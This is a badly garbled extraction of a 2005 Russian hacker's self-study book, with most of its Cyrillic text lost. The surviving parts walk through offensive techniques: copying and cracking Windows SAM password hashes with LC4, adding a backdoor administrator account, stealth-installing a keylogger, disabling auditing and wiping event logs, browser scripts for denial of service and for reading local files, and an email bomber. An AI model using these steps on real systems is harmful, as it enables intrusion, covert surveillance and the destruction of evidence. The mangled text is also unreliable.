Самоучитель хакера. Подробное

Alex Atsctoy

004.056.53(075.8) 32.973.202-0878-1+32.973.2-018.278-1

Alex Atsctoy. : . . .: [, ] / Alex Atsctoy. .: , 2005. 192 .: . ISBN 5-93673-036-0. CIP

? , , - .

- : www.3st.ru E-mail: [email protected]

ISBN 5-93673-036-0

, 2005 , 2005 , 2005

1. 8

2. Windows ZOOO/Xf. . " 4. 5. fyayêpofc Web 6. 7. XaKUHflCQ

25 37 57 73 8399

8. Web~caumo&9. AmaKU'PoS

115143

. Windows 2000/Xf 11. 160 176 191

1. .............................................................................................. 8 ............................................... . .................................................. 9 - ? ................................................................................................... 10 ............................................................................................... 13 ................................................................................................ 16 ....................................................................................................... 16 ................................................................................. 17 ............................................................................. 75 Web ........................................................................................................... 19 Web ............................................................................................................ 20 ................................................................................................................ 21 ............................................................................................. 21 ................................................................ 22 - ....................................................................................................... 22 ................................................................................................................. 23 ................................................................................................................. 23

2. 231 WmdOMS 2OOO/XP. .............................................. 25 ........................................................................................................ 25 ............................................................................................................... 26 ........................................................................................................................... 27 Windows 2000/XP ................................................................... 28 SAM .............................................................................................................................. 29 ............................................................................................... 30 .............................................................................................................. 31 Windows 2000 ................................................................................ 33 ................................................................................................................. 35 ................................................................................................................. 36

.&.................................................? ................................................................................. 38 NTFSDOS Pro ...................................................................................................... 39 SAM .................................................................................................................. 44 .................................................................................... 47 ******** ............................................................................................. 50 ......................................................................................... 51 ............................................................................................. 52 ......................................................................................................... 53 ....................................................................................................... 53 ................................................................................................ .. 56

4. -

5758 59 63 66 68 69 70 72

5. & Web HTML Web-

7374 78 81 82

6.

8383 85 88 89 90 91 96 97

7. ICQ ICQ IP- ICQ- ICQ- ICQ ICQ-

99100 101 102 103 104 106 111 112 113

8. We|?~C3UmO& Web- Web- Web- IIS 5 Web- Teleport Pro HTML Web

115115 116 118 119 120 122 123 125 131 132 136 138 139 142

9. Ahl3KU " DoS !8 Smurf. Nuke Teardrop Ping of Death Land DoS

143144 145 145 147 148 149 151 752 154 154 755 155 756 159

10. Windows 2/. TCP/IP . 6

160 162 762 165 765

NetBus 168 169 173 175

. PhoneSweep 4.4 PhoneSweep 4.4 PhoneSweep

176177 178 179 180 782 185 186 186 190

1.

, - , , , , . , , . , ( ). !!! , , .. , , 2 () . . , : log: : 1: 2: em: e-mail . , ! . 13.06.1999, .. . !!! , http://www.super-internet-provider.ru , . , - , , , , , , , . , , , Web- .

- , . - , . , , , , , . - , , . - , , , . , , ! , , , . , , . - , 80- , , , , - , . .

, , , , . , , , . ( !), . - (-, !) , , . , , -

9

, . , , , , , , . , , , , , , - . , . , . , , , , , , , . , , , . , - , , , , . 20- - .

? , , , , , , - , - , , (, - ) , -

10

. , - , . , , . ( ). , : (, . ). , , , . Hard DISK [ Fdisk.exe] n- ( , ) . ! , , ! [ 24% ] , POWER - ! IDE- . , . , , , - , , , - , HARD DISK - , - , - , . , Must die, . Windows, , . , , . , Windows ? , , - ? , , , , .

11

, ? 21 ( ). : : , , , , , . , . : , . . , , , . : . . , . . , , . . : , . , ? - , , ? , ? , - . , , , , , ... . , , , (, , ) . , :12

- , 16 19 . ( 80%) , nerd. : 1) , ; 2) . (, ? - ). Windows Unix, TCP/IP , , C++, Perl, Basic. , . - , - 19- . , , , , . , , , . , , -, , . , , , . - , , , . , . , , - , - . . , , , . , . , , .

, , .. , . , , . , -

13

, , , . , , , , . , , : - .

, . , , , , , , [3]. , , , . , .

" , , , , . - - , . - , , , . , , , .

14

, , , , . , . , - , . , , , . , , (.. , ). , , , , , , . , , , , ( rootkit - ). - UNIX, Windows 2000 , 4, , , , , Windows, , . . IP-, . - . , - , , -, - , . , 4 - , , .

15

- , - . - , , . , DoS , IDS. . , .

, - , , . , , . , . ; , . - , , , , , . , , , . , [3] , . , , [3] ! [1]. , ( ). ,

16

, , - . , , , , , . , . , - , , . , . , , , . - .

. Web- (, RIPE NCC http://www.ripe.net). Web-, Whols, , , . , , , Web-. Yahoo (http://www.yahoo.com), Rambler (http://www.rambler.ru). . , , , , . , , , [3]. Google (http://www.google.com), . , , C:\WINNT, W i n dows NT/2000. - , .

17

, , Teleport Pro. , Web- , . , , HTML Web- - , , HTTP . , , , , , , , , ( 1 1 ). , Web- - , , . , .

, , , . . -, , , , .. , , . - SAM (Security Account Manager - ), . SAM - , 3 , , LOphtCrack LC4 (http://www.atstake.com). -, , , , Windows , MS Office . , . , 3 . Office Password 3.5 (http://lastbit.com/download.asp) Windows - , , . Revelation SnadBoy (http://www.snadboy.com). , 18

***** - , , - Revelation . , , , , , , . . - ? , , - , - .

Welo - . , Web-, , -. , Web, Web-, Web- , . Web- 5 . , . , Web-, . . , , 6 Death & Destruction Email Bomber - . , . , , , 6 Brutus.19

, , ICQ. - IP- ICQ- ( flood - ) ICQ- , ! - , 7 ICQ Flooder, ICQ-MultiVar, . - , IP- ICQ- ICQ, , . , .

WebWeb- , , , DoS, - . , IIS 5 (Internet Information Server - ) Microsoft . Web- , Web-, HTML . 8 , , CGIScan Brutus, IIS . 9 , DoS. Web- , , Web-. , DoS , - , . Web , , CGI-. , , .

20

TCP/IP , , , , IP-, , . , . 10 - SuperScan, foundstone_tools (http://www.foundstone.com). W2RK (Windows 2000 Resource Kit - Windows 2000), , W2HK (Windows 2000 Hacker Tools - Windows 2000). , , , .

flepex&am , , . , , - , . , . , , . - . , , , , . - SpyNet, .

21

, , VPN (Virtual Private Network - ) , , - . , , , , , .

, W2RK ( Windows 2000) W2HK - Windows 2000, . Windows (Explorer) Windows, . , , , password, . [3], , , , . , , , password.txt , ISP. , , . , NTFS Windows 2000/XP, , , PGP Desktop Security.

11~ - , , .. . Web- , (., , http://www.securitylab.ru). 8 IIS. CGIScan , . , 22

- , , IIS 4. Web , . - , , . . , ; , , - ( ). , , - -, , - .

- , . - , . 10 NetBUS, . , . - , , , . . - , , . , , - - , , ... , , .

- , , , , . , , ( ), , ? , , -

23

, , ? , - ? , , ( ), , , , - . , . . , , , , . , , . , , , , .... , , - Windows 2000/XP.

24

2.

Windows /Xf Windows 2000 TCSEC (Trusted Computer System Evaluation Criteria - ) . , Windows 2000, , . . . .

.

. , - , , , , , .. , - . , ( log in - ), - , . , , , , . Windows NT/2000/XP SAM (Security Account Manager - ). SAM , , . SAM - , 3 . , . , , , . , -

, , . , , , .., , , , . , , -, (, , ) , , , . , , , , . Windows NT 4 NTLM (NT LAN Manager - NT). NTLM Windows 2000/XP. NTLM, , LM (LAN Manager - ), , Windows NTLM. Windows 2000/XP Kerberos, , , . - Windows 2000/XP, - Windows 2000 Kerberos. - , Windows 2000/XP - . , , , , - .

, , , . - . Windows , , , . , , . , , , , , .

26

Windows 2000/XP , Windows NT/2000/XP . , . , , . , , . , (Guest), , - (User), . , , , . , (Administrators), , - , , ...

urn, , . , , - , .. , . , , . , , , , , . Windows NT/2000/XP, , , - . , 4, , , . , , , , ,

27

, , . , 11 , , . , , [2], [6], , - Windows 2000/XP, , .

Windows 2OOO/XP Windows 2000/XP SRM (Security Reference Monitor - ). SRM Windows 2000/XP, .. . Windows 2000/XP , , SRM. . LSA (Local Security Authority - ), , , LSA. , LSA . , LSA , . SAM (Security Account Manager - ), . , LSA. AD (Active Directory - ), AD . , LSA. , , : , , Kerberos; , . , , , : , , 28

Windows 2000/XP , /, . SAM AD , LSA . , , , .. , SRM. , , Windows 2000/XP. , . -, (SAM AD); -, . , .

SAM, , , , . , , , SAM AD, . SAM %%\5132\\5, AD - %KopHeBoft_KaTanor%\ntds\ntds.dit. , , , - ! . , , , , , Windows 2000/XP. SAM Windows NT 4 , NTLM , , , LM, Windows. LM , SAM , , LOphtCrack (http://www.atstacke.com) , . LOphtCrack SAM, , , pwdump (http://www.atstacke.com). Windows - pwdump SAM , LOphtCrack, - , LM - .29

Service Pack 3 Windows NT 4, , Syskey () , SAM. Windows NT 4 Syskey ; Windows 2000/XP Syskey . LM NTLM Syskey , . , - , 3-4 , . , 1 Microsoft, - Microsoft! Windows. , , .

Windows 2000/XP , , , , , ? . , , Windows, SID (Security IDentifier), 48- , . Windows 2000/XP SID, Windows 2000 SID. . , , ? (, ..) Windows ACL (Access Control List - ), (Access Control Entries - ). SID . ACL

30

Windows 2000/XP , , (Explorer) Windows, Windows 2000/XP. ACL. Windows 2000/XP (, ) LSA , SID 8 , . , , SRM 8 ACL , , . , , - . , , - , . , . - ACL , Windows 2000/XP . , (, http://www.rootkit.com). , ACL ! , - , ? , . , , Windows 2000/XP.

Windows NT 4 , .. , Windows 2000/XP ADS (Active Directory Services). ADS Windows 2000, Windows 2000 Server. , , . - , , , , - ADS , , .. . , , IP- .

31

ADS , , - , . OU (Organization Units), , , , , , , , OU. OU - , .. OU , OU . Windows 2000/XP , . , . Windows 2000 , - , Windows 2000 Windows NT. , , . Windows 2000/XP , . , , . , .. . , . , domen. : com*!.domen, comp2.domen... , , , , domenl, domen2,... , , . , domenl domen2 , domen2 domenl, domen2 comp1.domen2.domenl, comp2.domen2.domen1, ... compN.domen2.domen1. domenl domen2 , forest, . , domenl compl.domenl.forest, comp2.domen1.forest , domen2 compl.domen2.forest, comp2.domen2.forest, .... .

32

Windows 2000/XP , - , : . (Universal group), , , . (Global Group), , , . (Local group domain), , . ACL . - . , , AD, , , . - AD SAM, , SAM. AD , AD, , ( 10 ), AD , , , . , . , , , Window 2000, . , , LC4 LOpghtCrack . , , - - .

Windows 2000 Windows 2000 , . - , 332 - 5830

, -, , . -, , , [7], , . - , , - , . . - , - , AD. - - , - -. - , . . -, - . -, , - , , , , . , , , . . - , , , LM, - LM ( , , [3]). Microsoft NTLM ( Service Pack 3 Windows NT 4) NTLMv2 ( Service Pack 4 Windows NT 4). , , Windows 2000 Kerberos, - , . . , Windows 2000/XP Windows , LM. Windows 2000/XP Kerberos, NTLM LM.34

Windows 2000/XP - TCP- 88 , Kerberos, . - LM NTLM, LOphtCrack . , - , . , ?

, , , . , , . , . , , , . , . , , Windows 2000. , Microsoft , , . Windows XP Windows. Windows 2000/XP [7], . , , , . , , Retina, [7].

35

-, . -, , , VPN (Virtual Private Network - ). VPN , . VPN , . , , , , (Bruce Schneier), (Applied Cryptography), - . , - , , . - , .. .

Windows 2000/XP , . SAM, LSA, SRM, ADS, LM, NTLM, Kerberos . Windows, . Windows 2000/XP, / ADS , Microsoft Press Windows 2000.

36

3

& Window 2000/XP, , , , , ? , 2, , , , . . ( , - . .) - , . , , , ( - ...). , , . , , , , , , ( - ). ? , - , . - . , . , - , - . , . -, , - - , Windows. , , , , . , , ,

(. 1), - , . - , , , - -. -, , , Windows BIOS . , Windows 2000/XP .

, - (, ). , , - MS-DOS ! - , . -, BIOS , BIOS . . -, BIOS , NTFS, Windows 2000/XP. , MS-DOS - - , - . , -, , ( - - , ! , . , , ), Windows 2000/XP. - NTFSDOS Professional (http://www.winternals.com) Winternals Software LP, NTFS MS-DOS. , , Windows 2000/XP . - , . NTFSDOS Professional - .

38

1515 fro NTFSDOS Pro . Windows NTFSDOS Professional NTFSDOS Professional Boot Disk Wizard ( NTFSDOS Professional). , NTFS. . , FORMAT/S SYS MS-DOS. Windows XP Create an MS-DOS startup disk ( MS-DOS). > * NTFSDOS Professional (Start Programs NTFSDOS Professional). (. 3.1).

wizard will help you install V/indows NT/200DvXP system files needed NTFSDOS Professional to run from a MS-DOS diskette or hard disk

PMC. 3.1. NTFSDOS Pro > Next (). (. 3.2), , . > , Next (), . NTFSDOS Pro MS DOS ( 437). (. 3.3) .

39

NTFSDOS Professional Boot Disk Wizard copies drivers and system files from an existing Windows NT/20QP/xP installation or CD-ROM to your hard disk or a pair of floppy diskettes. If you wish to create bootable diskettes you must add MS-DOS to the diskettes yourself, either before or after using this program. Use the FORMAT/S or SYS commands from a MS-DOS shell to make bootable diskettes. You can also make a bootable diskette on Windows XP by opening My Computer, selecting the "Format" option from the context menu of your diskette drive, and formatting a diskette with the "Create an MS-DOS startup disk" option checked.

< Back

Next >

Cancel

J

. .2.

NTFSDOS Pro uses the character set tor Hie United States version of MS-DOS (aide page 437) by default Select any additional character sets you use with DOS. Japan, code page 932 Korean (Johab). code page 1361 Korean, code page 949 MS-DOS Canadian-French, code page 863 MS-DOS Icelandic, code page 661 MS-DOS Multilingual (Latin 1). code page 650 MS-DOS Nordic, code page 865 MS-DOS Portuguese, code page 86 MS-DOS Slavic (Latin II). code page 852

< Back

Next >

Cancel

-

. .. > Next (). NTFSDOS Pro (. 3.4). Windows NT/2000/XP, NTFSDOS Pro. , , C:\WINNT, \I386 Windows NT/2000/XP, - Service Pack. > Next (). NTFSDOS Pro (. 3.5).40

Pro uses copies of several files located in your Windows NT/200Q/XP m directory. Specify the name of your Windows NT/2Q.OOVXP installation directory, or a directory containing the required Windows NT/2000 system files. |c\ASFRool

Finish (), . NTFSDOS Pro, . NTFSDOS Pro . , , NTFSPRO.EXE, NTFS . , , MS-DOS , FAT FAT32, NTFSDOS Pro . MS-DOS NTFS, Windows 2000/XP . , ( - ), , , . , - , , , . , , , . - SAM, , , _/132/1'|.

43

5 SAM, SAM. NTFSDOS Pro, MS-DOS SAM /KOpeHb_CMCTeMbi/system32/config . - , , LC4 - LOphtCrack (http://www.atstake.com). . 3.9 LC4 Import ().

IB?!

Import | Senion

Help

Import From Local Machine Import From Remote Registiy.. Import From SAM File... Import From Sniffer... Import From .LC File... Import From .LCS (LC3) File Import Frum PWDUMP File...

I File * New Session ( * ). , . 3.9. > Import Import From SAM File ( * SAM). SAM. > SAM, 1-3. > (. 3.10) Session Begin Audit ( ) .44

?l@stakeLC4 -(Unlilbdll File View Import Sestion Help

.i u_u empty ' empty ' empty ' empty ' amply " empty '

* \ ft \ ' empty '

IALEX- (ALEX-lALEX-3 lALEX-3 lALEX-3 [ALEX-3

lALEX-3

Administrator ASPNET Guett HelpAssittant IUSH_ALEX-3 IWAM_ALEX-3 NewUzer

Od Oh Qm us

e.;

i asCS

mporled 7 accounts

Puc. 3.10. SAM , , SAM, . , . 3.11, SAM.

Adnuniitialoi ASPNET Guel HelpAti.tlonl IUSH.ALEX-3 IWAM.ALEX-3 NenUter

. 3.11. SAM ! , - 007 , , . , , 5 Pentium 2 400 . 45

- , LC4 . LC4 Auditing Options For This Session ( ), . 3.12.Dictionary Crack D Enabled Dictionary List [

The Dictionary Deck tests For passwords that are the same as the words listed in the word file. This test is very fast and finds the weakest passwords. Dictionary/Brute Hybrid Crack El Enabled |0 3 Characters to prepend I Characters to append

Common letter substitutions (much slower) The Dictionary/Brute Hybrid Crack tests for passwords that are variations of the words in the word file. It finds passwords such as "Dana99" or "monkeys!". This test is fast and finds weak passwords. Brute Force CrackEl Enabled D Distributed Character Set |A-ZandO-9 Custom Claraclw Set ch ch*:ttrt

Ptrtli.

I Oil

J

The Brute Force Crack tests fa passwords that are made up of the characters specified in the Character Set. It finds passwords such as "WeR3pll6s" a "vC569t12b". This lest is slow and finds medium to strong passwords. Specify a character set with more characters to crack stronger passwords.

OK

Cancel

Puc. 3.12. , LC4 : Dictionary Crack ( ), Dictionary List ( ), . LC4 , , . , , , , , .., . Dictionary/Brute Hybrid Crack (/ ), , / , , . Password???, .

46

Brute Force Crack ( ), . , . Character Set ( ) , Custom (), Custom Character Set (List each character) ( ( )) . Distributed () . File Save Distributed ( ) . LC4 Windows NT/2000/XP. Windows, Windows 95/98, Pwltool.

' Windows , , . MS Office (http://www.elcomsoft.com), - OfficePassword 3.5. , , ******* Revelation SnadBoy (http://www.snadboy.com). , , AZPR , Passware Kit, http://www.lostpassword.com. Windows - , /, , , Window - OfficePassword .

47

OfficePassword 3.5 OfficePassword 3.5 Lotus Organizer, MS Project, MS Backup, Symantec Act, Schedule+, MS Money, Quicken, MS Office - Excel, Word, Access, Outlook, ZIP VBA, MS Office. OfficePassword 3.5 . Word password.doc, - ? , Windows, password.doc, (. 3.13). - , OfficePassword 3.5 : > OfficePassword (Start Programs * OfficePassword). OfficePassword (. . 3.14).Password Enter password to open file : \test\password . doc

II[ OKCancel

1

Puc. 3.13. WordI OfficePassword "DEMO" File Took Option* Help

1-]

Selecl documentYou can also diag-and-drop files from Internet Explorer onto this window. > (c) 1998-2001 Vitas Ramanchauskas. LastBit Software Select document ( ) Windows MS Office. , Word . , MS Word . , - OfficePassword 3- .48

- , . > , Select recovery mode ( ), . 3.15.Select lecoverv mode Jocument path: C:\test\passwotddoc (Word) Version : Wotd 8.0+ ntemal version: 133 Word language : Russian (0419) incryption type: Strong Text size : 537 Preview Automatic OflicePassword automatically selects most suitable recovery options. Recovery may take a lot of time (up to several months in case ol a long password]. About 80% of all passwords could be recovered within 48 hours. Use guaranteed recovery otherwise. User-defined Adjust settings to optimize search for specific case. (This option is for advanced useis only.) Guaranteed recovery Success is guaranteed! Important: please read the documentation. Additional fee may apply. I Click here to learn

Cancel

| Display help info

Next

Puc. 3.15, > Select recovery mode ( ) : Automatic ( ), , Next (), , . User-defined ( ), . . Guaranteed recovery ( ), , , , . > NextlOlficePasswoid 'DEMO* Password found: '007' (without quotes) The password has been copied onto the clipboard Would you like to open the document now?

L

Yes

No

Puc. 3.16. !49

(). , , (. 3.16). OfficePassword 3.5 , , . - , . , - , . , , 24-28 , . , , . , , - , .

******, - , , (, ), , ******. , , , . - , , , . , . , -, . , , NetBus . . 3.17 Revelation Snad (http://www.snadboy.com) NetBus NetBus.

50

* SnadBoy's Revelation 'Circled V Cursor Drag to reveal password | Check For Update) | About

Exit I Copy to clipboard

Text ol Window Under 'Circled V Cursor (il available)

007Status Revelation active. Length of available text: 3

Reposition Revelation out of the way when dragging 'circled V When minimized, put in System Tray

Always on top Hide 'How to' instructions

i SWORD-2000 iMycq Change Hoct "Host information-

^

How to 1) Left click and drag (while holding down the left mouse button) the 'circled V

2) As you drag the 'circled +' cursor over different fields on various windows, the text in the field under the cursor will be displayed in the Text of Window...' box. 3) Release the left mouse button when you have revealed the text you desire. NOTE - II the field contains text hidden by asterisks (or some other character), the actual text will be shown. In some cases the text may actually be asterisks. NOTE - Not an of the fields that the cursor passes over will have text that can be revealed. Check the status light foi availability of text. Bright green - text available (See length of text:' in Status area) Blight red - no text available

Destination: |SWORD-200 Host name/IP: 1.0-0-1 TCP-port: User name: |Administrator Password:

Cancel

Puc. 3.17. NetBus Sword-2000 ! Revelation . 'Circled+'Cursor ('+') SnadBoy's Revelation ( . 3.17 Password ()). Revelation, Test of Window Under Circles and Cursor (if available) ( ( )) ( ). . 3.17, 007 NetBus Sword-2000, ( ). ( NetBus) [11].

- , - , - , , - . : .51

, 4. - , , , . , , , . - , backdoor - , , .

&* , , , , . MS-DOS: NET USER /ADD, , NET LOCALGROUP /ADD, . . 3.18 .r^JCommand Prompt

- NewUser 00 /add |The command completed successfully. C:\>net localgroup fldministrators NewUspr /add I The command completed successfully.

Puc. 3.18. NewUser NewUser , , . , , .

52

- , . Windows - Startup Document and Settings ( ) , . Startup, All users, . , , . , (), . IKS (Invisible KeyLogger Stealth - ), - http://www.amecisco.com.

- , . - , , . IKS - http://www.amecisco.com, Invisible KeyLogger 97 8 10 , . Windows NT/2000/XP, , , 1^' l+ir^n+l0"8"]. IKS Windows NT/2000/XP. , IKS , . IKS . Web- iks2k20d.exe , . 3.19.

53

D Standard Install | p Stealth Install | D Uninslall |

It's recommended that you use Standard Install if this is your first time in using IKS. Just accept the defaults and dick on "Install Now" button. Or you can dick on 'Read readme M" to get familiar with the concept of IKS first. During a standard installation a program directory will be created; program files will be placed in the directory. An icon to the log file viewer will be placed on the desktop. No Tile renaming (stealth features) will take place. Install Directory |C \Progrem Files\iks You need to heva administrator rights on this system for it to install successfully.

rf you want to uninstall in the future, just run this program (iksinstall.exe) again, dick on the "Unmstall" tab, then "Uninstall Now" to automatically uninstall the standard installation.

Read readme.M

. 3.19. IKS Install Now ( ) - . IKS . , IKS , iks.sys, . , dataview.exe, . 3.20.Settings Help

0 Filter Out Arrow Keys D Filter Out Ctrl and Alt Keys Rtter Out F1 to FT 2 Keys Filter Out All Other Function Keys Import Binary Log From:

Use Notepad Translate to Text Only Gear La a Clear Binary Log Upon Exit 0 dear Text Log Upon Exit

Save Text Log To: C:\DOCUME~1\ADMINI~1.000\LOCALS I Browse,

Puc. 3.20.

54

Go! () , . . 3.20 , , . , IKS , . iks.sys KOpeHb_CHCTeMbi/system32/drivers, ( Regedt32 . 3.21).Registry Editor [HKEY LOCAL MACHINE on Locnl Mnchi Registry Edit Tree View Security Options Window SGemuwa SGpc &I37DRIVER CEJIAS ICQ Groupware COIISADMIN IPMksl CD ILDAP QIMAP4D32 GDIMonitor inetaccs Cllnetln(o Inport Help

Start: REG_DWORD: 0x3 Type: REG_DWORD: 0x1

Puc. 3.21. Windows (, The Cleaner, ). IKS, Stealth Install ( ) (. 3.19) - , calc.sys, (, - - ). IKS . 007 Stealth Monitor, Web-, , , . - Windows, - , , notepad.exe.

55

, BIOS, . , . , , . , - , , , , ( ), , , . - , , . Windows 2000/XP . Windows 9x/Me, - , PGP Desktop Security, . Windows 9x/Me , . , , , , - ? . .

56

4.

- , , , . , , , , , - , , , . , , - , , , . , - . 1 , 50% , - , , . , , , . , ,- , , . , ( ). , - ( ). , . , - , , , . .

, , , . , , , - . , privacy - . , , , , , , , . , [10], (, ) , - , - privacy. , , , , , , - , . . , , , , , . , . . -, . , , . , , , - , . -, . . , Web- , Web, . , , ,

58

(, ).

, , - , , - . , ? , , . : , . , Web-. , - . , . Windows, (Explorer) , . , Windows. , MS Office. , , , . ? , .

. , , (Explorer) , . , (Delete) Windows , , . Windows , , , , , MS Office. , , (Show hidden files and folders) 59

(Folder Options) Windows. * (Tools * Folder Options) (. 4.1).)0 j

| | j

I

(

. | | |

: " " ; D 0 0 () Q Q - , / " 004.tmp |~WRL1120.tmp ~WRL19B2.tmp |~WRL3531.tmp

| |

Puc. 4.2. , , - ., .WBK, 60

, ~$. , , , Windows, , , Windows. , - , , . ? , MS Office, , , , Norton Utilities. - Cleaner Disk Security (http://www.theabsolute.net/sware/index.htmlttClndisk).

, , , . , . , , . - , , . ( 100%) . . 4.3 Clean Disk Security 5.01 (http://www.the-absolute.net/sware/ index.html#Clndisk), , ( ). Clean Disk Security 5.01 Erase fully ( ). , , - . 4.3. Clean Disk Security 5.01 ( 61

FAT NTFS). , , . Windows, Windows, Temp ( , , ) . -, , , (cookie). , (. 4.3). . 4.3, : Simple () - 6 , . ; 1 . NIS - 7 (.. ) . Gutmann - 35 (.. ). (Peter Gutmann) . . , ( ). Test mode ( ) - #10 ASCII. . , Clean Disk Security 5.01 , , . , [10]. - , : (UPS); . , , . , .

62

, , . , , . -, , , . , . , , , Norton Utilities, , / , . , , [10]. ( ) - , , regedt32. . , , NTFS.

, , , - . , - - Web- . , , . . , , .

& , , . . , .

63

, . (). , , , . ( Web-, , , ), , , , . , , . (., [5], [10], - , , ). , -, . , , , . , -. -, , . . , . , , , . -, - , ! - , , , . , , !!!

Web- , 64

. HTML- Web-. Web- , , Web-, . , , Web- http://www.privacy.net/analyze, , Web- . . 4.4, , Web-, - .3l Analyze Your Internet Privacy - Microsoft Internet Explorer ^ ^ " ^ ^ ^ ^ ~ ^ ^

BBSBBBgg

**- ^

Your Browser Type and Operating System: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MSIECrawler) All Information sent by your web browser when requesting this web page: Accept: */* Accept-Language: ru Connection; keep-alive Host: www.privacy.net UserAgent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MSIECrawler) Cookie: Date=1/30/2002; Privacy. net=Privacy+Analysis Via: 1.1 cea15. 1.1 proxy.iptelecom.net.ua:3128 (Squid/2.4.STABLE3) X-Forwarded-For: 212.9.232.151, 212.9.224.89 Cache-Control: max-age=259200

a_

. 4.4. Web- , ( ) Whols, 1, . , - , IP- . Web- Web- , IP- - ...

653 - 5830

, , Web-, ( anonymizer - ). , Web-, , . , , http://www.anonymizer.com. (. 4.5).Anonymizer.com -- Onlinu Privacy Sorvic 4- - - 1 | U [ ife-r ^ " hup.//wwwanonymteBf.coin.

Anonymizer.com(| AboutPrivacy'

FIND IT STO

S

spyCap " '"

:

. 4.5. Web- Go. - , - FTP-, , , . , , , Web-, , . ( ), .

Web -, - (Proxy server) (. 4.6).

66

- '" . , D Q 0 - : |www.anonymize| ; J8080 [...!

D - - : : :

1 1 1

|

. 4.6. - - , , , .. Web- -, . - . - HTTP, FTP-, Web-, FTP. - , . - . - . , , , Web-, , Yahoo. proxy+server+configuration+Explorer, Web-, , -. - , , .

67

, , , , , , , . , , , 3 IKS. , , NetBus (http://www.netBus.org). , , , , , . : - , ( - ). IP- , -, . , , . , Back Orifice 2000 31337 , , 31336, , , . , Windows NT/2000/XP. , auditpol W2RK, - , , elsave.exe (http://www.ibt.ku.dk/jesper/ELSave/default.htm). (Event Viewer) Windows 2000/XP. , , (Hidden). Windows, . , . , 68

, , explorer.exe, Windows Windows. , EliteWrap, [11]. ( Rootkit - ). , , . . Tripwire (http://www.tripwiresecurity.com), , Cisco Systems (http://www.cisco.com) . Windows 2000/XP , , , [7].

, , , - , . , / . Windows NT/2000/XP, , auditpol.exe W2RK. ( ) , . :

C:\Auditpol>auditpol \\ComputerName /disable Running... Audit information changed successfully on \\ComputerName ... New audit policy on \\ComputerName ... (0) Audit Disabled

69

System Logon Object Access Privilege Use Process Tracking Policy Change Account Management Directory Service Access Account Logon

= No = No = No = No = Success and Failure = No = No = No = No

//ComputerName - , /disable . auditpol.exe - , , , , ( auditpol /? ).

Windows 2000/XP : > (Start) (Settings Control Panel).File Action View Help

Event Viewer [Local] I Type I Description Application Error Record! I Sire 512...

Delete all records n the log

Puc. 4.7. Windows70

(Control Panel) (Administrative Tools). (Event Viewer). Event Viewer ( ) (. 4.7). (Security Log); . Clear all Events ( ). , . 4.8, .

Do you want lo save "Security" before clearing it? Yet No Cancel

Puc. 4.8. > (No), . . , - ! , - . , elsave.exe (http://www.ibt.ku.dk/jesper/ELSave/default.htm). , , Windows NT 4, Windows 2000. . C:\els004>elsave -s \\ComputerName - -s , - . , . elsave /? , . , elsave.exe . - elsave.exe Windows ( (Start), AT MS-DOS). System, .71

- ( , - ). , , . , , , , . - ! 50% ( - !) - ! - , , [9]. , , Norton Personal Firewall, PGP Desktop Security . , , , .

72

5

# , , , , . , , , , , . , 90- , . , , . , , , . , , , TCP/IP. - , . - , , . , . , , , (, ). , . , , , , Word .., , , , . WWW (World Wide Web - ), Web (). Web - , Web . - 1961 , Web 1992 . , , -

. Web - Web , , Web. Web . Web, Web URL (Uniform Resource Locator - ), Web. , Web HTTP (Hyper Text Transfer Protocol - ). , Web, HTML (Hyper Text Markup Language - ). , , , - HTML CGI HTTP. Web , , Web, , - , , - 1 Web . Web , , Web - HTML Web, ( browser, , , ), Web Web-.

HTML - Web, Web, , , , , , , , , . , HTML , Web, , Internet Explorer (ffi) Netscape Navigator (NN).74

Web : Web - , HTML Web , , , HTML, , - Web? - HTML? . ( ) , , Web-.

, DoS , Web . , , Web, , . open ( ) , JavaScript MainPage.html , HTML 8. 1. 8.1. HTML Web- < SCRIPT LANGUAGE* " JavaScript " > generation () ; function generation () { var d=0; while (true) { a = new Date; d = a.getMilliseconds( ) ; window. open ("MainPage. html", d, "width=250, height =250") ;

HTML, , . Windows 2000/XP IE 5 IE 6 HTML, .

75

IE 5 IE 6 .

tlep - . , 8.2 ... ( ). 8.2. HTML Web- var p = external.... ; HTML 8.2 IE 5 6 var p 8.2. ( [3], [10]). , , - HTML .

[3] HTML, CLSID. 8.3. HTML, . 8.3. HTML 8.3 IE 6 , . 5.1.

76

WebJQ C:\Documenl. and Selling*\Alex4Mj> DocuroenUSWork D... [)11

. 5.1. HTML C:\Windows\ system32\calc.exe, , .

Web- , JavaScript, HTML- Web-, . , IFRAME, Web- . 8.4 HTML, , C:\security.txt. 8.4.

Web- _

C:\security.txt

alert (" : \n " +b . document . body . innerText ) ; 77

II.navigate("file://:/Security.txt"); setTimeout('Il.navigate(nfile://C:/Security.txt")',1000); 8.4 IE 5 IE 6 , . 5.2.

File

Edit

View

Favorite*

Tools

Help

QMd.-0-

. 5.2, security.txt - - Web-. , , , JavaScript . 5.2. Web- . Web- NavigateComplete2, [3].

C:\security.txt

Web-caumo& Web, , , - Web- . , Web- ActiveX, . , , , , , , -, - .. - , , . , - .78

Web - , - Web-, . , , . , Web - . , Windows Web- Microsoft NetBus. Web-, . Web , . 8.7 HTML, -. 8.7. HTML Bubliki&Baranki !!!!! - (Address) , , , , . IE Address Javascript. URL HTML IE 6, ; , IE 6 HTML . ! , , Web- - . , , , .

, , , , Web . . , , , Web. , Web- . . -, , ,

81

, . . , , . - Web-, - , . : . , , SSL. Web- . . , , , . . , . , , , , . .

Web - . , . , , , , Web . , - Web , , - , , . , , 4 IE Netscape, , 5 6 . , , .82

6.

, , , , , . , . , , . , , , , , ... , - !

- (, , , 1, ). , , , ! , . ? - - - . ( Flood - , ) ( Spam - , . Spam ). (.. ), , , . , -

SMTP-. Death & Destruction Email Bomber ( & ) 4.0, DnD (http://www.softseek.com/Utilities/VBRUN_Files/). , . , DnD, . Avalanche - Avalanche DnD, . . 6.1 DnD 4.O.Death and Desliuclion 4.0 File Clones Header Session Random Lists Mailing Lilts Window Extras Help

-Email Bombing is rarely damaging to the target but is always damaging to smtp hosts. I do NOT condone mailbombing as it causes problems for SysAdmins of servers. I did not make this program for people to blast away at each other. PLEASE use it responsibly, and if you HAVE to email bomb, then please use the option to randomly switch servers in between messages; as it lightens the loads on the server. Have fun and don't ruin a good sysadmins time by flooding his server!

Send bomb to: Say bomb is from: I Message Subject: I

_pj

CC:

| | 0 Randomly Change | EdilL 7 ] 0 Randomly Change | Edit List

Message Body: | SMTP Spy

